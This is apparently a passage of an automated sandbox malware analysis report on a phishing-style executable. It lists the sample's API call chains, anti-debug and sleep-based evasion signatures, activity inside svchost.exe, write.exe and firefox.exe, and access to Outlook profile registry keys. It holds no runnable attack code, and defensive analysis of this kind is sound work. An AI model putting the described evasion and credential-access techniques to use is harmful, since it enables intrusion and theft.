            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\write.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: RFQ - HTS45785-24-0907I000.exeStatic file information: File size 1360461 > 1048576
            Source: Binary string: write.pdbGCTL source: svchost.exe, 00000001.00000002.2168962083.0000000003212000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2168940553.0000000003200000.00000004.00000020.00020000.00000000.sdmp, TNPukQnytLH.exe, 00000005.00000002.4161153797.0000000001517000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: write.pdb source: svchost.exe, 00000001.00000002.2168962083.0000000003212000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2168940553.0000000003200000.00000004.00000020.00020000.00000000.sdmp, TNPukQnytLH.exe, 00000005.00000002.4161153797.0000000001517000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: TNPukQnytLH.exe, 00000005.00000002.4160485230.000000000098E000.00000002.00000001.01000000.00000005.sdmp, TNPukQnytLH.exe, 00000007.00000002.4161291435.000000000098E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: RFQ - HTS45785-24-0907I000.exe, 00000000.00000003.1744701582.0000000003760000.00000004.00001000.00020000.00000000.sdmp, RFQ - HTS45785-24-0907I000.exe, 00000000.00000003.1745326700.0000000004570000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2073984809.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2076245715.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2169156210.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2169156210.0000000003900000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000006.00000002.4161906836.0000000004740000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000006.00000003.2169043412.00000000043EE000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000003.2172852458.0000000004595000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000002.4161906836.00000000048DE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: RFQ - HTS45785-24-0907I000.exe, 00000000.00000003.1744701582.0000000003760000.00000004.00001000.00020000.00000000.sdmp, RFQ - HTS45785-24-0907I000.exe, 00000000.00000003.1745326700.0000000004570000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.2073984809.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2076245715.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2169156210.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2169156210.0000000003900000.00000040.00001000.00020000.00000000.sdmp, write.exe, write.exe, 00000006.00000002.4161906836.0000000004740000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000006.00000003.2169043412.00000000043EE000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000003.2172852458.0000000004595000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000002.4161906836.00000000048DE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: write.exe, 00000006.00000002.4162310977.0000000004D6C000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000006.00000002.4160569986.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, TNPukQnytLH.exe, 00000007.00000002.4161791969.00000000027EC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2462381400.000000001C7AC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: write.exe, 00000006.00000002.4162310977.0000000004D6C000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000006.00000002.4160569986.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, TNPukQnytLH.exe, 00000007.00000002.4161791969.00000000027EC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2462381400.000000001C7AC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
            Source: RFQ - HTS45785-24-0907I000.exeStatic PE information: real checksum: 0xa961f should be: 0x15ba7c
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_00462463 push edi; ret 0_2_00462465
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041385D push edx; retf 1_2_004138EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D829 push esp; ret 1_2_0040D801
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004138D8 push edx; retf 1_2_004138EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004138E3 push edx; retf 1_2_004138EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00414913 push ds; ret 1_2_00414914
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D238 pushad ; iretd 1_2_0040D23A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00403300 push eax; ret 1_2_00403302
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D4E3 push edx; retf 1_2_0040D4EB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D77F push esp; ret 1_2_0040D801
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0390225F pushad ; ret 1_2_039027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039027FA pushad ; ret 1_2_039027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039309AD push ecx; mov dword ptr [esp], ecx1_2_039309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0390283D push eax; iretd 1_2_03902858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03901368 push eax; iretd 1_2_03901369
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeCode function: 5_2_03BEEA4D push esp; ret 5_2_03BEEA25
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeCode function: 5_2_03BF5B37 push ds; ret 5_2_03BF5B38
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeCode function: 5_2_03BF4B07 push edx; retf 5_2_03BF4B13
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeCode function: 5_2_03BF4A81 push edx; retf 5_2_03BF4B13
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeCode function: 5_2_03BF4AFC push edx; retf 5_2_03BF4B13
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeCode function: 5_2_03BF7249 pushfd ; ret 5_2_03BF7263
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeCode function: 5_2_03BEE9A3 push esp; ret 5_2_03BEEA25
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeCode function: 5_2_03BEE707 push edx; retf 5_2_03BEE70F
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeCode function: 5_2_03BF677C push ebx; iretd 5_2_03BF677D
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeCode function: 5_2_03BF6623 push FFFFFF8Fh; iretd 5_2_03BF662F
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeCode function: 5_2_03BF65F8 push ecx; iretd 5_2_03BF6601
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeCode function: 5_2_03BF6D24 pushad ; ret 5_2_03BF6D25
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeCode function: 5_2_03BEE45C pushad ; iretd 5_2_03BEE45E
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047709AD push ecx; mov dword ptr [esp], ecx6_2_047709B6
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_008620D1 push ecx; iretd 6_2_008620DA
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\write.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\write.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\write.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\write.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\write.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeAPI/Special instruction interceptor: Address: 40B4B14
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0397096E rdtsc 1_2_0397096E
            Source: C:\Windows\SysWOW64\write.exeWindow / User API: threadDelayed 5086Jump to behavior
            Source: C:\Windows\SysWOW64\write.exeWindow / User API: threadDelayed 4886Jump to behavior
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-85788
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeAPI coverage: 3.6 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\write.exeAPI coverage: 2.8 %
            Source: C:\Windows\SysWOW64\write.exe TID: 2232Thread sleep count: 5086 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\write.exe TID: 2232Thread sleep time: -10172000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\write.exe TID: 2232Thread sleep count: 4886 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\write.exe TID: 2232Thread sleep time: -9772000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe TID: 3236Thread sleep time: -65000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe TID: 3236Thread sleep count: 34 > 30Jump to behavior
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe TID: 3236Thread sleep time: -51000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe TID: 3236Thread sleep count: 36 > 30Jump to behavior
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe TID: 3236Thread sleep time: -36000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\write.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\write.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0086C340 FindFirstFileW,FindNextFileW,FindClose,6_2_0086C340
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
            Source: write.exe, 00000006.00000002.4160569986.00000000008F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllr
            Source: TNPukQnytLH.exe, 00000007.00000002.4161395740.0000000000B8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: firefox.exe, 00000008.00000002.2463776603.000002551C6AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllCC
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeAPI call chain: ExitProcess graph end nodegraph_0-84914
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\write.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0397096E rdtsc 1_2_0397096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417593 LdrLoadDll,1_2_00417593
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_0045A370 BlockInput,0_2_0045A370
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_040B3760 mov eax, dword ptr fs:[00000030h]0_2_040B3760
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_040B4D80 mov eax, dword ptr fs:[00000030h]0_2_040B4D80
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_040B4DE0 mov eax, dword ptr fs:[00000030h]0_2_040B4DE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03928397 mov eax, dword ptr fs:[00000030h]1_2_03928397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03928397 mov eax, dword ptr fs:[00000030h]1_2_03928397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03928397 mov eax, dword ptr fs:[00000030h]1_2_03928397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392E388 mov eax, dword ptr fs:[00000030h]1_2_0392E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392E388 mov eax, dword ptr fs:[00000030h]1_2_0392E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392E388 mov eax, dword ptr fs:[00000030h]1_2_0392E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395438F mov eax, dword ptr fs:[00000030h]1_2_0395438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395438F mov eax, dword ptr fs:[00000030h]1_2_0395438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE3DB mov eax, dword ptr fs:[00000030h]1_2_039DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE3DB mov eax, dword ptr fs:[00000030h]1_2_039DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE3DB mov ecx, dword ptr fs:[00000030h]1_2_039DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE3DB mov eax, dword ptr fs:[00000030h]1_2_039DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D43D4 mov eax, dword ptr fs:[00000030h]1_2_039D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D43D4 mov eax, dword ptr fs:[00000030h]1_2_039D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EC3CD mov eax, dword ptr fs:[00000030h]1_2_039EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A3C0 mov eax, dword ptr fs:[00000030h]1_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A3C0 mov eax, dword ptr fs:[00000030h]1_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A3C0 mov eax, dword ptr fs:[00000030h]1_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A3C0 mov eax, dword ptr fs:[00000030h]1_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A3C0 mov eax, dword ptr fs:[00000030h]1_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A3C0 mov eax, dword ptr fs:[00000030h]1_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039383C0 mov eax, dword ptr fs:[00000030h]1_2_039383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039383C0 mov eax, dword ptr fs:[00000030h]1_2_039383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039383C0 mov eax, dword ptr fs:[00000030h]1_2_039383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039383C0 mov eax, dword ptr fs:[00000030h]1_2_039383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B63C0 mov eax, dword ptr fs:[00000030h]1_2_039B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E3F0 mov eax, dword ptr fs:[00000030h]1_2_0394E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E3F0 mov eax, dword ptr fs:[00000030h]1_2_0394E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E3F0 mov eax, dword ptr fs:[00000030h]1_2_0394E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039663FF mov eax, dword ptr fs:[00000030h]1_2_039663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h]1_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h]1_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h]1_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h]1_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h]1_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h]1_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h]1_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h]1_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392C310 mov ecx, dword ptr fs:[00000030h]1_2_0392C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A08324 mov eax, dword ptr fs:[00000030h]1_2_03A08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A08324 mov ecx, dword ptr fs:[00000030h]1_2_03A08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A08324 mov eax, dword ptr fs:[00000030h]1_2_03A08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A08324 mov eax, dword ptr fs:[00000030h]1_2_03A08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03950310 mov ecx, dword ptr fs:[00000030h]1_2_03950310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A30B mov eax, dword ptr fs:[00000030h]1_2_0396A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A30B mov eax, dword ptr fs:[00000030h]1_2_0396A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A30B mov eax, dword ptr fs:[00000030h]1_2_0396A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B035C mov eax, dword ptr fs:[00000030h]1_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B035C mov eax, dword ptr fs:[00000030h]1_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B035C mov eax, dword ptr fs:[00000030h]1_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B035C mov ecx, dword ptr fs:[00000030h]1_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B035C mov eax, dword ptr fs:[00000030h]1_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B035C mov eax, dword ptr fs:[00000030h]1_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FA352 mov eax, dword ptr fs:[00000030h]1_2_039FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D8350 mov ecx, dword ptr fs:[00000030h]1_2_039D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D437C mov eax, dword ptr fs:[00000030h]1_2_039D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A0634F mov eax, dword ptr fs:[00000030h]1_2_03A0634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E284 mov eax, dword ptr fs:[00000030h]1_2_0396E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E284 mov eax, dword ptr fs:[00000030h]1_2_0396E284
